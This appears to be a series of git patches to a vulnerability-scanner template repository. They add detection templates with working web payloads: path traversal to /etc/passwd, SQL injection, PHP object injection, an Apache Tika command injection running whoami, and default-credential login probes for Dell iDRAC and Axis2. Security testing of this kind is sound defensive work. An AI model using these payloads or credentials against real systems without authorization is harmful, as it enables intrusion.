"{{BaseURL}}/ucmdb-api/connect" + - "{{BaseURL}}:8443/ucmdb-api/connect" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + part: body + condition: and \ No newline at end of file From 74a0535f8f3d202ae80ed49cfa6f0da0c24e96eb Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:19:36 +0700 Subject: [PATCH 058/370] :fire: Add CVE-2020-11854 --- cves/2020/CVE-2020-11854.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-11854.yaml diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml new file mode 100644 index 0000000000..d1a1f65238 --- /dev/null +++ b/cves/2020/CVE-2020-11854.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-11854 + +info: + name: Micro Focus UCMDB RCE + author: dwisiswant0 + severity: critical + reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html + description: | + This template supports the detection part only. + + UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, + but this module can probably also be used to exploit Operations Bridge Manager + (containeirized) and Application Performance Management. + + Originated from Metasploit module (#14654). + tags: cve,cve2020,ucmdb,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/ucmdb-api/connect" + - "{{BaseURL}}:8443/ucmdb-api/connect" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + part: body + condition: and \ No newline at end of file From 1ab87a6842908df07fe5f41df817b2e7758a78ac Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:22:23 +0700 Subject: [PATCH 059/370] :recycle: Add Micro Focus Checks workflow --- workflows/micro-focus-workflow.yaml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 workflows/micro-focus-workflow.yaml diff --git a/workflows/micro-focus-workflow.yaml b/workflows/micro-focus-workflow.yaml new file mode 100644 index 0000000000..1aa19b70da --- /dev/null +++ b/workflows/micro-focus-workflow.yaml @@ -0,0 +1,11 @@ +id: micro-focus-workflow + +info: + name: Micro Focus Checks + author: dwisiswant0 + description: A simple workflow that runs all Micro Focus related nuclei templates on a given target. + +workflows: + - template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml + - template: cves/2020/CVE-2020-11853.yaml + - template: cves/2020/CVE-2020-11854.yaml From 9f98cd3da891b4cdca988eee85abae42852bcf5c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:24:53 +0700 Subject: [PATCH 060/370] :pencil: Add default port --- default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml index 25a7fe3f8e..23d8dccad0 100644 --- a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml +++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml @@ -10,6 +10,7 @@ requests: - method: POST path: - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;" + - "{{BaseURL}}:8443/ucmdb-ui/cms/loginRequest.do;" body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB" matchers-condition: and matchers: From bc00089e97a13f3789b2407aed237e56a87a481d Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:30:30 +0700 Subject: [PATCH 061/370] :blue_book: Update descriptions --- cves/2020/CVE-2020-11853.yaml | 2 +- cves/2020/CVE-2020-11854.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml index 5e325fb415..8e683f847a 100644 --- a/cves/2020/CVE-2020-11853.yaml +++ b/cves/2020/CVE-2020-11853.yaml @@ -9,7 +9,7 @@ info: This template supports the detection part only. UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, - but this module can probably also be used to exploit Operations Bridge Manager + but this template can probably also be used to detect Operations Bridge Manager (containeirized) and Application Performance Management. Originated from Metasploit module (#14654). diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index d1a1f65238..2cc61de29d 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ b/cves/2020/CVE-2020-11854.yaml @@ -9,7 +9,7 @@ info: This template supports the detection part only. UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, - but this module can probably also be used to exploit Operations Bridge Manager + but this template can probably also be used to detect Operations Bridge Manager (containeirized) and Application Performance Management. Originated from Metasploit module (#14654). From 80ab50a9f0fecdf658f2b6efe68572ae661535b0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 18:41:33 +0530 Subject: [PATCH 062/370] misc changes --- .../dell/dell-idrac-default-login.yaml | 10 +++++-- technologies/dell-idrac-detect.yaml | 28 ++----------------- 2 files changed, 9 insertions(+), 29 deletions(-) diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index 05cd6e1cb6..8a2eee2710 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -1,6 +1,6 @@ id: dell-idrac-default-login info: - name: dell-idrac-default-login + name: Dll iDRAC Default login author: kophjager007 severity: high tags: dell,idrac,dlogin @@ -12,7 +12,6 @@ requests: - "{{BaseURL}}/data/login" body: "user=root&password=calvin" headers: - Host: "{{Hostname}}" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Content-Type: application/x-www-form-urlencode Referer: "{{BaseURL}}/login.html" @@ -21,4 +20,9 @@ requests: matchers: - type: status status: - - 200 \ No newline at end of file + - 200 + + matchers: + - type: word + words: + - 0 \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell-idrac-detect.yaml index 31618b85bf..ae59631f5c 100644 --- a/technologies/dell-idrac-detect.yaml +++ b/technologies/dell-idrac-detect.yaml @@ -10,33 +10,9 @@ requests: headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - - "{{BaseURL}}/sysmgmt/2015/bmc/info" + - "{{BaseURL}}/login.html" - matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word - part: body - condition: and words: - - "iDRACName" - - "BuildVersion" - - extractors: - - type: regex - part: header - regex: - - iDRAC/[0-9]{1,2} - - type: regex - part: body - regex: - - iDRAC[0-9]{1,2} - - type: regex - part: body - name: fwver - group: 1 - regex: - - '"FwVer" *: *"([^"]+)"' \ No newline at end of file + - 'Integrated Dell Remote Access Controller' \ No newline at end of file From 367a1117f6305e047ab7f3672705614748f92b9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 13:12:14 +0000 Subject: [PATCH 063/370] Auto Update README [Fri Feb 26 13:12:14 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 05d10da0c3..c7838f77a8 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | -| exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 14 | default-logins | 11 | +| exposures | 55 | technologies | 48 | misconfiguration | 48 | +| workflows | 22 | miscellaneous | 14 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 606 files**. +**63 directories, 609 files**. From a7ec2e79b00efaf2b4fa236b249092d683316183 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 13:14:20 +0000 Subject: [PATCH 064/370] Auto Update README [Fri Feb 26 13:14:20 UTC 2021] :robot: --- README.md | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 9cedaad55e..91686dc216 100644 --- a/README.md +++ b/README.md @@ -37,14 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | -| workflows | 22 | miscellaneous | 14 | default-logins | 12 | +| workflows | 22 | miscellaneous | 15 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 609 files**. - +**63 directories, 612 files**. From 1ba9f0d33dc24bb7eca3a61046f9a8e93189d6d5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 20:04:38 +0530 Subject: [PATCH 065/370] syntax update and added additional endpoints --- .../dell/dell-idrac-default-login.yaml | 1 - technologies/dell-idrac-detect.yaml | 28 ++++++++++++++++++- 2 files changed, 27 insertions(+), 2 deletions(-) diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index 8a2eee2710..f0e9139351 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -22,7 +22,6 @@ requests: status: - 200 - matchers: - type: word words: - 0 \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell-idrac-detect.yaml index ae59631f5c..8e86f218e7 100644 --- a/technologies/dell-idrac-detect.yaml +++ b/technologies/dell-idrac-detect.yaml @@ -10,9 +10,35 @@ requests: headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: + - "{{BaseURL}}/restgui/start.html" + - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - "{{BaseURL}}/login.html" + matchers-condition: and matchers: + - type: status + status: + - 200 - type: word + part: body words: - - 'Integrated Dell Remote Access Controller' \ No newline at end of file + - "Dell Integrated Remote Access Controller " + - "Integrated Dell Remote Access Controller" + - "iDRAC" + - "PowerEdge" + + extractors: + - type: regex + part: header + regex: + - iDRAC/[0-9]{1,2} + - type: regex + part: body + regex: + - iDRAC[0-9]{1,2} + - type: regex + part: body + name: fwver + group: 1 + regex: + - '"FwVer" *: *"([^"]+)"' \ No newline at end of file From 211ced6be608f184a50bc558e55eefefc2d638da Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 22:05:49 +0700 Subject: [PATCH 066/370] Create CVE-2017-16877.yaml --- cves/2017/CVE-2017-16877.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2017/CVE-2017-16877.yaml diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml new file mode 100644 index 0000000000..8e37e84ce3 --- /dev/null +++ b/cves/2017/CVE-2017-16877.yaml @@ -0,0 +1,26 @@ +id: CVE-2017-16877 + +info: + name: Nextjs v2.4.1 LFI + author: pikpikcu + severity: high + refrence: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 + tags: cve,cve2017,nextjs,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_next/../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + condition: and + + - type: status + status: + - 200 From 481ba6aba1d0c1ad50a993f7cc41ae6acdba540d Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 22:44:31 +0700 Subject: [PATCH 067/370] Create duomicms-sql-injection.yaml --- .../other/duomicms-sql-injection.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/duomicms-sql-injection.yaml diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml new file mode 100644 index 0000000000..b05a57fa60 --- /dev/null +++ b/vulnerabilities/other/duomicms-sql-injection.yaml @@ -0,0 +1,26 @@ +id: duomicms-sql-injection + +info: + name: DuomiCMS SQL Injection + author: pikpikcu + severity: high + refrence: https://redn3ck.github.io/2016/11/01/duomiCMS/ + tags: duomicms,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))" + + matchers-condition: and + matchers: + + - type: word + words: + - "e0ec043b3f9e198ec09041687e4d4e8d" + part: body + condition: and + + - type: status + status: + - 200 From f4e8e558a5230c20cda61b95cb162b7cc37b2f94 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Fri, 26 Feb 2021 12:49:47 -0300 Subject: [PATCH 068/370] Create moodle-changelog.yaml --- miscellaneous/moodle-changelog.yaml | 30 +++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 miscellaneous/moodle-changelog.yaml diff --git a/miscellaneous/moodle-changelog.yaml b/miscellaneous/moodle-changelog.yaml new file mode 100644 index 0000000000..cfeb24ab23 --- /dev/null +++ b/miscellaneous/moodle-changelog.yaml @@ -0,0 +1,30 @@ +id: moodle-changelog-file + +info: + name: Moodle Changelog File + author: oppsec + severity: info + description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version. + +requests: + - method: GET + path: + - "{{BaseURL}}/lib/upgrade.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "This files describes API changes in core libraries and APIs," + - "information provided here is intended especially for developers." + - "new my moodle and profiles API" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From 0723b219639126a779ba4fdd757ff28494b15bab Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 26 Feb 2021 23:56:21 +0530 Subject: [PATCH 069/370] Create phpmyadmin-wooYun.yaml --- misconfiguration/phpmyadmin-wooYun.yaml | 32 +++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 misconfiguration/phpmyadmin-wooYun.yaml diff --git a/misconfiguration/phpmyadmin-wooYun.yaml b/misconfiguration/phpmyadmin-wooYun.yaml new file mode 100644 index 0000000000..52fa01a388 --- /dev/null +++ b/misconfiguration/phpmyadmin-wooYun.yaml @@ -0,0 +1,32 @@ +id: phpmyadmin-wooYun + +info: + name: phpMyAdmin-WooYun + author: dhiyaneshDK + severity: high + reference: https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ + tags: cve,phpmyadmin,lfi +requests: + - raw: + - | + POST /scripts/setup.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 82 + + + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" From 2a0d868ce8cdd34186f911f8410ff7ced3bf2cfb Mon Sep 17 00:00:00 2001 From: Kophjager007 Date: Fri, 26 Feb 2021 12:49:21 -0600 Subject: [PATCH 070/370] Updated and added Dell iDRAC files --- .../dell/dell-idrac-default-login.yaml | 4 +-- .../dell/dell-idrac9-default-login.yaml | 30 +++++++++++++++++++ technologies/dell/dell-idrac6-detect.yaml | 29 ++++++++++++++++++ technologies/dell/dell-idrac7-detect.yaml | 29 ++++++++++++++++++ technologies/dell/dell-idrac8-detect.yaml | 29 ++++++++++++++++++ .../dell-idrac9-detect.yaml} | 22 +++++--------- workflows/dell-idrac-workflow.yaml | 9 ++++-- 7 files changed, 132 insertions(+), 20 deletions(-) create mode 100644 default-logins/dell/dell-idrac9-default-login.yaml create mode 100644 technologies/dell/dell-idrac6-detect.yaml create mode 100644 technologies/dell/dell-idrac7-detect.yaml create mode 100644 technologies/dell/dell-idrac8-detect.yaml rename technologies/{dell-idrac-detect.yaml => dell/dell-idrac9-detect.yaml} (64%) diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index f0e9139351..b34153e775 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -1,6 +1,6 @@ id: dell-idrac-default-login info: - name: Dll iDRAC Default login + name: Dell iDRAC6/7/8 Default login author: kophjager007 severity: high tags: dell,idrac,dlogin @@ -24,4 +24,4 @@ requests: - type: word words: - - 0 \ No newline at end of file + - 0 diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml new file mode 100644 index 0000000000..57d24e87da --- /dev/null +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -0,0 +1,30 @@ +id: dell-idrac9-default-login +info: + name: Dell iDRAC9 Default login + author: kophjager007 + severity: high + tags: dell,idrac,dlogin + +requests: + - method: POST + cookie-reuse: true + path: + - "{{BaseURL}}/sysmgmt/2015/bmc/session" + body: " user=root&password=calvin" + headers: + Host: "{{Hostname}}" + Accept: "application/json, text/plain, */*" + user: "root" + password: "calvin" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + Referer: "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"authResult":0' diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml new file mode 100644 index 0000000000..fa7f636dfb --- /dev/null +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -0,0 +1,29 @@ +id: dell-idrac6-detect +info: + name: Detect Dell iDRAC6 + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/data?get=prodServerGen" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "11G" + + extractors: + - type: regex + part: body + regex: + - '[0-9]{2}G' \ No newline at end of file diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml new file mode 100644 index 0000000000..f11ad8b32e --- /dev/null +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -0,0 +1,29 @@ +id: dell-idrac7-detect +info: + name: Detect Dell iDRAC7 + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/data?get=prodServerGen" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "12G" + + extractors: + - type: regex + part: body + regex: + - '[0-9]{2}G' \ No newline at end of file diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml new file mode 100644 index 0000000000..bc21d228dd --- /dev/null +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -0,0 +1,29 @@ +id: dell-idrac8-detect +info: + name: Detect Dell iDRAC8 + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/data?get=prodServerGen" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "13G" + + extractors: + - type: regex + part: body + regex: + - '[0-9]{2}G' \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml similarity index 64% rename from technologies/dell-idrac-detect.yaml rename to technologies/dell/dell-idrac9-detect.yaml index 8e86f218e7..94265b4d98 100644 --- a/technologies/dell-idrac-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,6 +1,6 @@ -id: dell-idrac-detect +id: dell-idrac9-detect info: - name: Detect Dell iDRAC + name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info @@ -10,9 +10,8 @@ requests: headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - - "{{BaseURL}}/restgui/start.html" - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - - "{{BaseURL}}/login.html" + # iDRAC9 has a different endpoint than 8 and below. matchers-condition: and matchers: @@ -20,25 +19,18 @@ requests: status: - 200 - type: word - part: body + part: all words: - - "Dell Integrated Remote Access Controller " - - "Integrated Dell Remote Access Controller" - - "iDRAC" - - "PowerEdge" + - "14G" extractors: - - type: regex - part: header - regex: - - iDRAC/[0-9]{1,2} - type: regex part: body regex: - - iDRAC[0-9]{1,2} + - '[0-9]{2}G' - type: regex part: body name: fwver group: 1 regex: - - '"FwVer" *: *"([^"]+)"' \ No newline at end of file + - '"FwVer" *: *"([^"]+)"' diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index fef179d8a6..aa6d7cc29a 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -6,6 +6,9 @@ info: tags: workflow workflows: - - template: technologies/dell-idrac-detect.yaml - subtemplates: - - template: default-logins/dell/dell-idrac-default-login.yaml \ No newline at end of file + - template: technologies/dell/dell-idrac6-detect.yaml + - template: technologies/dell/dell-idrac7-detect.yaml + - template: technologies/dell/dell-idrac8-detect.yaml + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac9-detect.yaml + - template: default-logins/dell/dell-idrac9-default-login.yaml From 5776c47894d397c13bbe7ccb6d2846fb11dbda14 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 20:03:32 +0000 Subject: [PATCH 071/370] Create axis2-default-password.yaml --- .../axis2/axis2-default-password.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/axis2/axis2-default-password.yaml diff --git a/default-logins/axis2/axis2-default-password.yaml b/default-logins/axis2/axis2-default-password.yaml new file mode 100644 index 0000000000..8ea5dd0653 --- /dev/null +++ b/default-logins/axis2/axis2-default-password.yaml @@ -0,0 +1,27 @@ +id: axis2-default-password + +info: + name: Axis2 Default Password + author: pikpikcu + severity: high + tags: axis,apache,dlogin + +requests: + - method: POST + path: + - "{{BaseURL}}/axis2-admin/login" + - "{{BaseURL}}/axis2/axis2-admin/login" + headers: + Content-Type: application/x-www-form-urlencoded + body: "userName=admin&password=axis2&submit=+Login+" + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 From 0bdb8d0d32d80d5925bc272abd0dbfe0cfcd5863 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 03:18:29 +0000 Subject: [PATCH 072/370] Create CVE-2018-1335.yaml --- cves/2018/CVE-2018-1335.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2018/CVE-2018-1335.yaml diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml new file mode 100644 index 0000000000..0eabe5183d --- /dev/null +++ b/cves/2018/CVE-2018-1335.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-1335 + +info: + name: Apache Tika 1.15-1.17 Header Command Injection + author: pikpikcu + severity: critical + reference: https://www.exploit-db.com/exploits/47208 + tags: cve,cve2018,apache,tika,rce + +requests: + - method: PUT + path: + - "{{BaseURL}}/meta" + headers: + X-Tika-OCRTesseractPath: cscript + X-Tika-OCRLanguage: //E:Jscript + Expect: 100-continue + Content-type: image/jp2 + Connection: close + body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/csv" + part: header + + - type: word + words: + - "org.apache.tika.parser.DefaultParser" + - "org.apache.tika.parser.gdal.GDALParse" + part: body + condition: and + + - type: status + status: + - 200 From 237f58f3f0b1bd95719ec9d31ad4a815dd534fc7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 14:46:19 +0700 Subject: [PATCH 073/370] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index bfc8c55cd2..1dd783b000 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -20,6 +20,9 @@ requests: - "{{BaseURL}}/phpversion.php" - "{{BaseURL}}/time.php" - "{{BaseURL}}/index.php" + - "{{BaseURL}}/temp.php" + - "{{BaseURL}}/PHPInfo.php" + - "{{BaseURL}}/old_phpinfo.php" matchers: - type: word words: From 8c903d9b7e12caeb88ed4f0d6f85e32d5923a307 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:08:26 +0000 Subject: [PATCH 074/370] Auto Update README [Sat Feb 27 08:08:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 91686dc216..86f6f6b3dc 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | -| workflows | 22 | miscellaneous | 15 | default-logins | 12 | +| workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 612 files**. +**63 directories, 613 files**. From 96d00013d9753a82130cb61db0e61873b4235e16 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:40:44 +0000 Subject: [PATCH 075/370] Auto Update README [Sat Feb 27 08:40:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 86f6f6b3dc..060d20910f 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | | workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 613 files**. +**63 directories, 614 files**. From 57d8fa0067d333908b3695b478cb16e6530bdbe6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 08:43:12 +0000 Subject: [PATCH 076/370] Auto Update README [Sat Feb 27 08:43:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 060d20910f..6231a04a74 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 102 | exposed-panels | 74 | +| cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | | workflows | 22 | miscellaneous | 16 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 614 files**. +**63 directories, 615 files**. From 